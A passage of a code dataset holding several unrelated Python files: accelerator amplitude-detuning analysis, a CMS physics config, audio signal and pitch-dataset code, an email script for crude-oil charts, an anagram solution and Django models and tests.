kick_file_modifiers.add_moving_average(kick_df, bbq_df, filter_opt)\n\n LOG.debug(\"Adding corrected natural tunes and stdev to kick data\")\n kick_df = kick_file_modifiers.add_corrected_natural_tunes(kick_df)\n\n return kick_df, bbq_df\n\n\ndef single_action_analysis(kick_df: tfs.TfsDataFrame, kick_plane: str, detuning_order: int = 1, corrected: bool = False\n ) -> tfs.TfsDataFrame:\n \"\"\"Performs the fit one action and tune pane at a time.\"\"\"\n LOG.info(f\"Performing amplitude detuning ODR for single-plane kicks in {kick_plane}.\")\n for tune_plane in PLANES:\n LOG.debug(\"Getting ampdet data\")\n data = kick_file_modifiers.get_ampdet_data(\n kickac_df=kick_df,\n 
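Editor's note: a conceptual sketch of what the "corrected natural tunes" above amount to. The exact columns and formula live in kick_file_modifiers, so treat the names and arithmetic here as an assumption for illustration only: the slow machine drift seen by the BBQ is subtracted from each kick's measured tune, leaving the kick-induced detuning.

import numpy as np

natq = np.array([0.3102, 0.3110, 0.3121, 0.3135])      # measured tune at each kick
bbq_mavg = np.array([0.3101, 0.3107, 0.3114, 0.3121])  # smoothed BBQ tune at the same times
# subtract the drift while keeping the overall tune level
natq_corrected = natq - (bbq_mavg - bbq_mavg.mean())
print(np.round(natq_corrected, 5))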
action_plane=kick_plane,\n tune_plane=tune_plane,\n corrected=corrected\n )\n\n LOG.debug(\"Fitting ODR to kick data\")\n odr_fit = fitting_tools.do_odr(\n x=data.action,\n y=data.tune,\n xerr=data.action_err,\n yerr=data.tune_err,\n order=detuning_order,\n )\n\n kick_df = kick_file_modifiers.add_odr(\n kickac_df=kick_df,\n odr_fit=odr_fit,\n action_plane=kick_plane,\n tune_plane=tune_plane,\n corrected=corrected\n )\n return kick_df\n\n\ndef double_action_analysis(kick_df: tfs.TfsDataFrame, detuning_order: int = 1, corrected: bool = False\n ) -> tfs.TfsDataFrame:\n \"\"\"Performs the full 2D/4D fitting of the data.\"\"\"\n if detuning_order > 1:\n raise NotImplementedError(f\"2D Analysis for detuning order {detuning_order:d} is not implemented \"\n f\"(only first order so far).\")\n LOG.info(\"Performing amplitude detuning ODR for diagonal kicks.\")\n data = {}\n\n # get all action arrays and all tune arrays, unfolded below\n for plane in PLANES:\n LOG.debug(f\"Getting action and tune data for plane {plane}.\")\n data[plane] = kick_file_modifiers.get_ampdet_data(\n kickac_df=kick_df,\n action_plane=plane,\n tune_plane=plane,\n corrected=corrected,\n dropna=False, # so that they still have the same lengths\n )\n\n LOG.debug(\"Fitting ODR to kick data\")\n odr_fits = fitting_tools.do_2d_kicks_odr(\n x=_get_ampdet_data_as_array(data, \"action\"), # gets [2Jx, 2Jy]\n y=_get_ampdet_data_as_array(data, \"tune\"), # gets [Qx, Qy]\n xerr=_get_ampdet_data_as_array(data, \"action_err\"),\n yerr=_get_ampdet_data_as_array(data, \"tune_err\"),\n )\n\n # add the fits to the kick header\n for t_plane in PLANES:\n for k_plane in PLANES:\n kick_df = kick_file_modifiers.add_odr(\n kickac_df=kick_df,\n odr_fit=odr_fits[t_plane][k_plane],\n action_plane=k_plane,\n tune_plane=t_plane,\n corrected=corrected\n )\n return kick_df\n\n\ndef get_approx_bbq_interval(\n bbq_df: TfsDataFrame, time_array: Sequence[CERNDatetime], window: int) -> Tuple[CERNDatetime, CERNDatetime]:\n \"\"\"Get approximate start and end times for averaging, based on window length and kick interval.\"\"\"\n bbq_tmp = bbq_df.dropna()\n\n # convert to float to use math-comparisons\n ts_bbq_index = kick_file_modifiers.get_timestamp_index(bbq_tmp.index)\n ts_kick_index = kick_file_modifiers.get_timestamp_index(time_array)\n ts_start, ts_end = min(ts_kick_index), max(ts_kick_index)\n\n ts_bbq_min, ts_bbq_max = min(ts_bbq_index), max(ts_bbq_index)\n\n if not (ts_bbq_min <= ts_start <= ts_bbq_max):\n raise ValueError(\"The starting time of the kicks lies outside of the given BBQ times.\")\n\n if not (ts_bbq_min <= ts_end <= ts_bbq_max):\n raise ValueError(\"The end time of the kicks lies outside of the given BBQ times.\")\n\n i_start = max(ts_bbq_index.get_indexer([ts_start], method=\"nearest\")[0] - window, 0)\n i_end = min(ts_bbq_index.get_indexer([ts_end], method=\"nearest\")[0] + window, len(ts_bbq_index) - 1)\n\n return bbq_tmp.index[i_start], bbq_tmp.index[i_end]\n\n\n# Private Functions ------------------------------------------------------------\n\n\ndef _check_analyse_opt(opt: DotDict) -> Tuple[DotDict, FilterOpts]:\n \"\"\"Perform manual checks on opt-sturcture.\"\"\"\n LOG.debug(\"Checking Options.\")\n\n # for label\n if opt.label is None:\n opt.label = f\"Amplitude Detuning for Beam {opt.beam:d}\"\n\n filter_opt = None\n if (opt.bbq_in is not None) and (opt.bbq_in != INPUT_PREVIOUS):\n # check if cleaning is properly specified\n method = opt.bbq_filtering_method\n if method is None:\n raise ValueError(f\"Please choose a filtering 
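Editor's note: fitting_tools.do_odr itself is not shown in this excerpt; below is a self-contained sketch of a first-order orthogonal distance regression with errors on both axes (scipy.odr), which is the kind of fit the calls above request with order=1, xerr and yerr.

import numpy as np
from scipy import odr

def linear(beta, x):
    return beta[0] + beta[1] * x   # offset + detuning slope

x = np.linspace(0.5, 2.0, 8)                            # action-like values
y = 0.31 + 2e-3 * x                                     # tune-like values
data = odr.RealData(x, y, sx=0.05 * np.ones_like(x), sy=1e-5 * np.ones_like(y))
fit = odr.ODR(data, odr.Model(linear), beta0=[0.3, 0.0]).run()
print(fit.beta, fit.sd_beta)                            # parameters and their standard errors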
method for the BBQ data from {list(FILTER_OPTS.keys())}\")\n\n missing_params = [name for name in FILTER_OPTS[method] if opt[name] is None]\n if any(missing_params):\n raise KeyError(\n f\"Missing parameters for cleaning method {method}: '{list2str(missing_params)}'\"\n )\n\n if bool(opt.fine_cut) != bool(opt.fine_window):\n raise KeyError(\n \"To activate fine cleaning, both fine cut and fine window need to be specified\"\n )\n\n if method == \"outliers\":\n filter_opt = OutlierFilterOpt(\n window=opt.window_length,\n limit=opt.outlier_limit\n )\n\n elif method == \"minmax\":\n filter_opt = [\n MinMaxFilterOpt(\n window=opt.window_length,\n min=opt.tunes_minmax[2*i],\n max=opt.tunes_minmax[2*i+1],\n fine_window=opt.fine_window,\n fine_cut=opt.fine_cut,\n )\n for i in range(2)\n ]\n else:\n filter_opt = [\n MinMaxFilterOpt(\n window=opt.window_length,\n min=opt.tunes[i] - opt.tune_cut,\n max=opt.tunes[i] + opt.tune_cut,\n fine_window=opt.fine_window,\n fine_cut=opt.fine_cut,\n )\n for i in range(2)\n ]\n\n if opt.output is not None:\n opt.output = Path(opt.output)\n\n return opt, filter_opt\n\n\ndef _get_bbq_data(beam: int, input_: Union[Path, str, int], kick_df: TfsDataFrame) -> TfsDataFrame:\n \"\"\"\n Return BBQ data from input, either file or timber fill, as a ``TfsDataFrame``.\n\n Note: the ``input_`` parameter is always parsed from the commandline as a string, but could be 'kick'\n or a kickfile name or an integer. All these options will be tried until one works.\n \"\"\"\n try:\n fill_number = int(input_)\n except (TypeError, ValueError) as e: # input_ is a file name or the string 'kick'\n if input_ == INPUT_KICK:\n LOG.debug(\"Getting timber data from kick times\")\n timber_keys, bbq_cols = _get_timber_keys_and_bbq_columns(beam)\n t_start = min(kick_df.index.to_numpy())\n t_end = max(kick_df.index.to_numpy())\n t_delta = timedelta(seconds=DTIME)\n data = timber_extract.extract_between_times(\n t_start - t_delta, t_end + t_delta, keys=timber_keys, names=dict(zip(timber_keys, bbq_cols))\n )\n else: # input_ is a file name or path\n LOG.debug(f\"Getting bbq data from file '{str(input_):s}'\")\n data = read_timed_dataframe(input_)\n if not len(data.index):\n raise ValueError(f\"No entries in {str(input_):s}.\")\n\n else: # input_ is a number, assumed to be a fill number\n LOG.debug(f\"Getting timber data from fill '{input_:d}'\")\n timber_keys, bbq_cols = _get_timber_keys_and_bbq_columns(beam)\n data = timber_extract.lhc_fill_to_tfs(\n fill_number, keys=timber_keys, names=dict(zip(timber_keys, bbq_cols))\n )\n return data\n\n\ndef _get_timber_keys_and_bbq_columns(beam: int) -> Tuple[List[str], List[str]]:\n keys = [get_timber_bbq_key(plane, beam) for plane in PLANES]\n cols = [get_bbq_col(plane) for plane in PLANES]\n return keys, cols\n\n\ndef _should_do_corrected(kick_df, bbq_in) -> List:\n if bbq_in is None:\n return []\n if bbq_in == INPUT_PREVIOUS and not any(CORRECTED in col for col in kick_df.columns):\n return []\n return [True]\n\n\ndef _save_options(opt: DotDict) -> None:\n if opt.output:\n save_config(Path(opt.output), opt, __file__)\n\n\ndef _get_ampdet_data_as_array(data: Dict[Any, AmpDetData], column: str) -> ArrayLike:\n \"\"\" Returns a matrix with number of rows as entries in data,\n each containing the values from the given column of the AmpDetData.\n e.g. 
[[Jx0, Jx1, Jx2, ....]\n [Jy0, Jy1, Jy2, ....]]\n \"\"\"\n return np.vstack([getattr(d, column) for d in data.values()])\n\n\ndef _write_dataframes(output: Path, kick_df: TfsDataFrame, bbq_df: TfsDataFrame):\n LOG.info(f\"Writing kick data to file in directory '{output.absolute()}'\")\n output.mkdir(parents=True, exist_ok=True)\n write_timed_dataframe(output / get_kick_out_name(), kick_df)\n if bbq_df is not None:\n LOG.info(f\"Writing BBQ data to file in directory '{output.absolute()}'\")\n write_timed_dataframe(output / get_bbq_out_name(), bbq_df)\n\n\n# Script Mode ##################################################################\n\n\nif __name__ == \"__main__\":\n analyse_with_bbq_corrections()\n","sub_path":"omc3/amplitude_detuning_analysis.py","file_name":"amplitude_detuning_analysis.py","file_ext":"py","file_size_in_byte":19479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"575228233","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"ANALYSIS\")\n#process.load('Configuration.StandardSequences.Services_cff')\n#process.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\n\nprocess.GlobalTag.globaltag = 'MCRUN2_74_V9'\n\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(5)\n)\n\n\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n'file:/hdfs/store/mc/RunIISpring15DR74/SUSYGluGluToHToTauTau_M-160_TuneCUETP8M1_13TeV-pythia8/MINIAODSIM/Asympt25ns_MCRUN2_74_V9-v1/10000/2A3929AE-5303-E511-9EFE-0025905A48C0.root'\n\t\t),\nfirstEvent = cms.untracked.uint32(628),\n\t\tinputCommands=cms.untracked.vstring(\n\t\t\t\t\t\t'keep *',\n\t\t\t\t\t\t'keep *_l1extraParticles_*_*',\n\t\t)\n)\n\n\n#added in etau and mutau triggers\nfrom UWAnalysis.Configuration.tools.analysisToolsMiniAod import *\ndefaultReconstructionMC(process,'HLT',\n [\n\t\t\t\t\t\t'HLT_Ele22_eta2p1_WP75_Gsf_LooseIsoPFTau20_v1', #etau\n 'HLT_Ele27_eta2p1_WP75_Gsf_v1', #etau\n\t\t\t\t\t\t'HLT_IsoMu17_eta2p1_LooseIsoPFTau20_v1', #mutau\n 'HLT_IsoMu24_eta2p1_IterTrk02_v1' #mutau\n ])\n\n \n\n#EventSelection\nprocess.load(\"UWAnalysis.Configuration.HiggsTauTauSync_cff\")\n\nprocess.metCalibration.applyCalibration = cms.bool(False)\n\nprocess.eventSelectionMT = cms.Path(process.selectionSequenceMT)\nprocess.eventSelectionET = cms.Path(process.selectionSequenceET)\n\ncreateGeneratedParticles(process,\n 'genDaughters',\n [\n \"keep++ pdgId = {Z0}\",\n \"keep pdgId = {tau+}\",\n \"keep pdgId = {tau-}\",\n \"keep pdgId = {mu+}\",\n \"keep pdgId = {mu-}\",\n \"keep pdgId = 6\",\n \"keep pdgId = -6\",\n \"keep pdgId = 11\",\n \"keep pdgId = -11\",\n \"keep pdgId = 25\",\n \"keep pdgId = 35\",\n \"keep abs(pdgId) = 36\"\n ]\n)\n\n\ncreateGeneratedParticles(process,\n 'genTauCands',\n [\n \"keep pdgId = {tau+} & mother.pdgId()= 25\",#{Z0}\n \"keep pdgId = {tau-} & mother.pdgId() = 25\"\n ]\n)\n\n\nfrom UWAnalysis.Configuration.tools.ntupleToolsSync import addMuTauEventTree\naddMuTauEventTree(process,'muTauEventTree')\n\nfrom UWAnalysis.Configuration.tools.ntupleToolsSync import addEleTauEventTree\naddEleTauEventTree(process,'eleTauEventTree')\n\naddEventSummary(process,True,'MT','eventSelectionMT')\naddEventSummary(process,True,'ET','eventSelectionET')\n\n# Make the framework shut up.\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 
1\n\n","sub_path":"CRAB/OLD/Sync/LT-MC.py","file_name":"LT-MC.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"481898122","text":"# pylint: disable=redefined-outer-name\nimport contextlib\n\nimport pytest\n\n\n@pytest.fixture(scope=\"session\")\ndef clean_context():\n    with contextlib.ExitStack() as stack:\n        yield stack\n\n\n@pytest.fixture(params=[True, False], scope=\"module\")\ndef enable_microbatch(request):\n    pytest.enable_microbatch = request.param\n    return request.param\n","sub_path":"tests/integration/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"576674650","text":"from thinkdsp import Chirp\nfrom thinkdsp import read_wave,normalize,unbias,decorate\nimport numpy as np\nimport matplotlib.pyplot as plt\nPI2=2*np.pi\nclass SawtoothChirp(Chirp):\n\n    def evaluate(self,ts):\n        \"\"\"\n        Override the evaluate function.\n        ts: sample times\n        \"\"\"\n\n        freqs = np.linspace(self.start,self.end,len(ts))\n        dts = np.diff(ts,prepend=0)\n        dphis =PI2*freqs*dts\n        phases =np.cumsum(dphis)\n        cycles = phases /PI2\n        frac,_=np.modf(cycles)\n        ys = normalize(unbias(frac),self.amp)\n        return ys\nwave = read_wave('72475__rockwehrmann__glissup02.wav')\nwave.make_spectrogram(512).plot(high=5000)\ndecorate(xlabel='Time(s)',ylabel='Frequency(Hz)')\nplt.show()\n","sub_path":"text3-3.py","file_name":"text3-3.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"6094513","text":"#!/usr/bin/env python\nfrom email.mime.text import MIMEText\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom smtplib import SMTP\nfrom time import gmtime, strftime\nimport urllib\nimport urllib2\nimport re\nresponse = urllib2.urlopen('http://content.barchart.com/genericapi/data.phpx?q=getSnapshotChart&data=D&ticker=CL*1')\nhtml = response.read()\nitems = html.split(\"\\n\")\nimage = [s for s in items if \"image\" in s]\nimage_string = \"\".join(image)\nimage_string_clean = re.search(\"(?P<url>https?://[^\\s]+)\", image_string).group(\"url\").replace(\"'\", \"\")\n\nurllib.urlretrieve(image_string_clean, \"crude_clf16_wti_latest_\" + strftime(\"%Y-%m-%d_%H_%M_%S\") + \".png\")\nurllib.urlretrieve(image_string_clean, \"crude_clf16_wti_latest.png\")\n\nmsg = MIMEMultipart()\nmsg['Subject'] = 'get_crude_price.py'\nmsg['From'] = 'from email addy'\nmsg['Reply-to'] = 'reply email addy'\nmsg['To'] = 'to email addy'\n\nmsg.preamble = 'Multipart message.\\n'\n\npart = MIMEText(\"Attached is the current crude oil price from http://www.nasdaq.com/markets/crude-oil.aspx\")\nmsg.attach(part)\n\npart = MIMEApplication(open(\"crude_clf16_wti_latest.png\",\"rb\").read())\npart.add_header('Content-Disposition', 'attachment', filename=\"crude_clf16_wti_latest.png\")\nmsg.attach(part)\n\nsmtp = SMTP(\"smtp.gmail.com\") #should work with yahoo smtp, or any other smtp, check if you need to start tls though\nsmtp.ehlo()\nsmtp.starttls()\nsmtp.login(\"user id\",\"password\") #Edit this derp\n\nsmtp.sendmail(msg['From'], msg['To'], msg.as_string())\n\n# To do\n# Clean up and make it more pythonic, add more keys to the msg object for body, file_attachment, and whatever else. 
This does the trick for now while I check with further with my girlfriend what she wants to see in the email\n","sub_path":"get_crude_oil.py","file_name":"get_crude_oil.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"25740707","text":"class Solution(object):\n\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n lookup = {}\n for word in strs:\n key = ''.join(sorted(word))\n if key in lookup:\n lookup[key].append(word)\n else:\n lookup[key] = [word]\n return list(lookup.values())\n","sub_path":"001-100/049-group-anagrams/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"374429869","text":"import torch\r\nfrom torch.utils.data import Dataset\r\n\r\nimport librosa\r\nimport os\r\nimport numpy as np\r\nimport random\r\nimport time\r\nimport json\r\nimport pickle\r\nimport argparse\r\n\r\ndef do_svs_spleeter(y, sr):\r\n from spleeter.separator import Separator\r\n import warnings\r\n separator = Separator('spleeter:2stems')\r\n warnings.filterwarnings('ignore')\r\n\r\n if sr != 44100:\r\n y = librosa.core.resample(y= y, orig_sr= sr, target_sr= 44100)\r\n\r\n waveform = np.expand_dims(y, axis= 1)\r\n\r\n prediction = separator.separate(waveform)\r\n # print (prediction[\"vocals\"].shape)\r\n ret_voc = librosa.core.to_mono(prediction[\"vocals\"].T)\r\n ret_voc = np.clip(ret_voc, -1.0, 1.0)\r\n\r\n ret_acc = librosa.core.to_mono(prediction[\"accompaniment\"].T)\r\n ret_acc = np.clip(ret_acc, -1.0, 1.0)\r\n del separator\r\n\r\n return ret_voc, ret_acc\r\n\r\n\r\ndef get_feature(audio_path):\r\n # TODO: Load audio from audio_path and generate feature.\r\n # return a 2-d (or maybe 3-d) array with shape (n, d) or (c, n, d), where n is the total frame number.\r\n y, sr = librosa.core.load(audio_path, mono=True)\r\n y_voc, y_acc = do_svs_spleeter(y, sr)\r\n\r\n y_acc = librosa.core.resample(y=y_acc, orig_sr=44100, target_sr=25600)\r\n\r\n feature = np.abs(librosa.cqt(y_acc, sr=25600, hop_length=256, fmin=librosa.midi_to_hz(24)\r\n , n_bins=96*4, bins_per_octave=12*4, filter_scale=1)).T\r\n # print (feature.shape)\r\n return feature\r\n # print (y.shape)\r\n\r\ndef process_pitch_and_note(json_path, feature_length):\r\n\r\n with open(json_path) as json_data:\r\n gt = json.load(json_data)\r\n pitch = gt[\"pitch\"] #(23446, 2)\r\n notes = gt[\"st\"] #(350, 2)\r\n \r\n # TODO: Match pitch and notes, return three lists: score_pitch (the pitch of the note), pitch_diff, \"is_inlier\"\r\n # inlier[i] = True if the frame i contains note, and the note prediction of frame i is correct.\r\n # The frame size of this function should be the same as the frame size of get_feature function.\r\n \r\n # print (feature_length)\r\n score_pitch = []\r\n is_inlier = []\r\n pitch_diff = []\r\n former_note = []\r\n next_note = []\r\n former_distance = []\r\n latter_distance = []\r\n\r\n cur_offset = 0\r\n # for j in range(1):\r\n for j in range(len(notes)):\r\n a = int(round(notes[j][0]*100.0))\r\n b = int(round(notes[j][1]*100.0))\r\n k = []\r\n\r\n for i in range(cur_offset, a):\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n\r\n cur_offset = b\r\n\r\n # k = [pitch[a][1],]\r\n\r\n # bool_ = 0\r\n \r\n 
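Editor's note: a quick usage check for the groupAnagrams solution above (run next to that class); sorting each word yields a canonical dictionary key, so grouping n words of length k costs O(n * k log k).

groups = Solution().groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"])
print(sorted(sorted(g) for g in groups))
# -> [['ate', 'eat', 'tea'], ['bat'], ['nat', 'tan']]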
pitch_diff_abs = []\r\n\r\n for i in range(a, b):\r\n if pitch[i][1] > 0:\r\n k.append(pitch[i][1])\r\n pitch_diff_abs.append(abs(notes[j][2]-pitch[i][1]))\r\n k = np.array(k)\r\n\r\n # print (k)\r\n pitch_med = np.median(k)\r\n pitch_max = np.max(k)\r\n pitch_min = np.min(k)\r\n\r\n if (pitch_min <= notes[j][2] or pitch_max >= notes[j][2]) and max(pitch_diff_abs) <= 3:\r\n for i in range(a, b):\r\n if pitch[i][1] > 0:\r\n is_inlier.append(True)\r\n pitch_diff.append(notes[j][2]-pitch[i][1])\r\n score_pitch.append(notes[j][2])\r\n former_note.append(notes[j-1][2])\r\n if j != len(notes)-1:\r\n next_note.append(notes[j+1][2])\r\n else:\r\n next_note.append(0)\r\n former_distance.append(i-a)\r\n latter_distance.append(b-i)\r\n\r\n else:\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n else:\r\n for i in range(a, b):\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n\r\n # print (pitch_med, pitch_max, pitch_min) \r\n # print (notes[j])\r\n \r\n \r\n # score_pitch.append(notes[j][2])\r\n # pitch_diff.append(abs(score_pitch-pitch_med))\r\n # print (cur_offset)\r\n for i in range(cur_offset, feature_length):\r\n is_inlier.append(False)\r\n pitch_diff.append(0)\r\n score_pitch.append(0)\r\n former_note.append(0)\r\n next_note.append(0)\r\n former_distance.append(0)\r\n latter_distance.append(0)\r\n\r\n \r\n score_pitch = np.array(score_pitch)\r\n pitch_diff = np.array(pitch_diff)\r\n is_inlier = np.array(is_inlier)\r\n former_note = np.array(former_note)\r\n next_note = np.array(next_note)\r\n former_distance = np.array(former_distance)\r\n latter_distance = np.array(latter_distance)\r\n\r\n print (score_pitch.shape)\r\n print (pitch_diff.shape)\r\n print (is_inlier.shape)\r\n print (former_note.shape)\r\n print (next_note.shape)\r\n print (former_distance.shape)\r\n print (latter_distance.shape)\r\n\r\n # (23446, n)\r\n return (score_pitch, pitch_diff, is_inlier, former_note, next_note, former_distance, latter_distance)\r\n \r\n \r\nclass PitchDiffDataset(Dataset):\r\n def __init__(self, json_paths, audio_paths):\r\n self.features = []\r\n self.score_pitch = []\r\n self.pitch_diff = []\r\n self.is_inlier = []\r\n self.former_note = []\r\n self.next_note = []\r\n self.former_distance = []\r\n self.latter_distance = []\r\n\r\n for i in range(len(json_paths)):\r\n\r\n json_path = json_paths[i]\r\n audio_path = audio_paths[i]\r\n\r\n features = get_feature(audio_path)\r\n features = np.array(features)\r\n score_pitch, pitch_diff, is_inlier, former_note, next_note, former_distance, latter_distance = process_pitch_and_note(json_path, features.shape[-2])\r\n\r\n # print (score_pitch)\r\n # print (pitch_diff)\r\n\r\n self.features.append(features) #(23446, 384)\r\n self.score_pitch.append(score_pitch) #(23446,)\r\n self.pitch_diff.append(pitch_diff) #(23446,)\r\n self.is_inlier.append(is_inlier) #(23446,)\r\n self.former_note.append(former_note)\r\n self.next_note.append(next_note)\r\n self.former_distance.append(former_distance)\r\n self.latter_distance.append(latter_distance)\r\n\r\n def __getitem__(self, idx):\r\n return (self.features[idx], self.score_pitch[idx], self.pitch_diff[idx], self.is_inlier[idx], self.former_note[idx], self.next_note[idx], self.former_distance[idx], self.latter_distance[idx])\r\n\r\n def 
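Editor's note: a distilled, standalone sketch (illustrative names, not the original helpers) of the inlier test implemented above: a note's frame span is accepted only when the score pitch falls inside the sung-pitch range and no voiced frame deviates by more than 3 semitones.

import numpy as np

def span_is_inlier(note_pitch, frame_pitches, tol=3):
    voiced = np.array([p for p in frame_pitches if p > 0])  # drop unvoiced (0) frames
    if voiced.size == 0:
        return False
    in_range = voiced.min() <= note_pitch or voiced.max() >= note_pitch
    return bool(in_range and np.abs(voiced - note_pitch).max() <= tol)

print(span_is_inlier(60, [59.2, 60.1, 0.0, 60.4]))  # True
print(span_is_inlier(60, [55.0, 56.0]))             # False: deviations exceed 3 semitones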
__len__(self):\r\n return len(self.features)\r\n","sub_path":"dataset_0804.py","file_name":"dataset_0804.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"76336515","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase, APIClient\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom .models import *\n# Create your tests here.\n\n\nclass NewsTest(APITestCase):\n\n def setUp(self):\n self.user = CustomUser.objects.create(phone=\"996777329848\")\n self.token = Token.objects.create(user=self.user)\n self.client = APIClient()\n self.news = News.objects.create(title=\"lalaland\",image=None,text='Pomogite')\n self.create_url = reverse('news_comments',kwargs={'pk': self.news.pk})\n\n def test_create_comment(self):\n data = {\n \"comment_field\":\"testcomment to new\",\n }\n self.client.force_authenticate(user=self.user)\n response = self.client.post(self.create_url,data)\n self.assertEqual(response.status_code,status.HTTP_201_CREATED)\n self.assertEqual(Comment.objects.count(),1)\n\n def test_create_comment_non_auth_user(self):\n data = {\n \"comment_field\":\"cheto ne ochen\"\n }\n response = self.client.post(self.create_url,data)\n self.assertEqual(response.status_code,status.HTTP_401_UNAUTHORIZED)\n","sub_path":"news/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"541889921","text":"import json\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.db import models\nfrom ldap3 import ALL, LEVEL, Connection, Server\nfrom url_or_relative_url_field.fields import URLOrRelativeURLField\n\n# Regular model classes\n\n\nclass Person(AbstractUser):\n sciper = models.IntegerField(null=True, blank=True, default=None)\n _is_dean = models.BooleanField(null=False, blank=False, default=False)\n\n def get_is_dean(self, *args, **kwargs):\n \"\"\" Returns a boolean value indicating if the current user is dean.\n Optionaly, you can pass a parameter called already_checked_users (list) containing the list of scipers of delegates that have already been inspected.\n This option exists in order to avoid infinite recursions (A delegates his role to A)\"\"\"\n\n already_checked_users = kwargs.get('already_checked_users', list())\n already_checked_users.append(self.sciper)\n\n if self._is_dean:\n return True\n\n delegators = self.person_set.all()\n for delegator in delegators:\n if delegator not in already_checked_users:\n if delegator.get_is_dean(already_checked_users=already_checked_users):\n return True\n\n return False\n\n def set_is_dean(self, value):\n self._is_dean = value\n\n is_institute_manager = models.BooleanField(null=False, blank=False, default=False)\n _managed_institutes = models.TextField(blank=True, null=True, default=None)\n\n def get_managed_institutes(self, *args, **kwargs):\n already_checked_users = kwargs.get('already_checked_users', list())\n\n institutes = list()\n\n # Load the institutes managed by the person itself\n already_checked_users.append(self.sciper)\n if self._managed_institutes != '' and self._managed_institutes is not None:\n institutes.extend(json.loads(self._managed_institutes))\n\n # Load the institutes managed through delegation\n delegators = self.person_set.all()\n for delegator in 
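Editor's note: setUp() in the NewsTest above creates a Token that the tests never actually send, because they authenticate with force_authenticate(). A sketch of an extra test method (to live inside that class) that exercises the token header itself, using standard DRF APIClient credentials; this assumes TokenAuthentication is enabled in the project settings.

    def test_create_comment_with_token_header(self):
        data = {"comment_field": "testcomment via token"}
        # send the token explicitly instead of bypassing authentication
        self.client.credentials(HTTP_AUTHORIZATION="Token " + self.token.key)
        response = self.client.post(self.create_url, data)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)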
delegators:\n            # compare scipers (ints), not Person objects, so the cycle guard can actually fire\n            if delegator.sciper not in already_checked_users:\n                if delegator.get_is_dean(already_checked_users=already_checked_users):\n                    return True\n\n        return False\n\n    def set_is_dean(self, value):\n        self._is_dean = value\n\n    is_institute_manager = models.BooleanField(null=False, blank=False, default=False)\n    _managed_institutes = models.TextField(blank=True, null=True, default=None)\n\n    def get_managed_institutes(self, *args, **kwargs):\n        already_checked_users = kwargs.get('already_checked_users', list())\n\n        institutes = list()\n\n        # Load the institutes managed by the person itself\n        already_checked_users.append(self.sciper)\n        if self._managed_institutes != '' and self._managed_institutes is not None:\n            institutes.extend(json.loads(self._managed_institutes))\n\n        # Load the institutes managed through delegation\n        delegators = self.person_set.all()\n        for delegator in delegators:\n            if delegator.sciper not in already_checked_users:\n                institutes.extend(delegator.get_managed_institutes(already_checked_users=already_checked_users))\n\n        return institutes\n\n    # def set_managed_institutes(self, value):\n    #     self._managed_institutes = json.dumps(value)\n\n    delegates = models.ManyToManyField(\"self\", symmetrical=False, blank=True, null=True, default=None)\n\n    _is_prof = models.BooleanField(null=False, blank=False, default=False)\n\n    def get_is_prof(self):\n        return self._is_prof\n\n    def set_is_prof(self, value):\n        self._is_prof = value\n\n    _is_associate_dean = models.BooleanField(null=False, blank=False, default=False)\n\n    def get_is_associate_dean(self):\n        return self._is_associate_dean\n\n    def set_is_associate_dean(self, value):\n        self._is_associate_dean = value\n\n    def get_prof_delegations(self, *args, **kwargs):\n        already_checked_users = kwargs.get('already_checked_users', list())\n\n        return_value = list()\n\n        if self.sciper not in already_checked_users:\n            already_checked_users.append(self.sciper)\n            if self.get_is_prof():\n                return_value.append({'sciper': self.sciper,\n                                     'first_name': self.first_name,\n                                     'last_name': self.last_name})\n\n        delegators = self.person_set.all()\n        for delegator in delegators:\n            if delegator.sciper not in already_checked_users:\n                return_value.extend(delegator.get_prof_delegations(already_checked_users=already_checked_users))\n\n        return return_value\n\n\n# Signals processing\n\ndef check_authorizations(sender, user, request, **kwargs):\n    \"\"\"Check if the user who just logged in is dean in LDAP.\n    Populates the is_dean flag 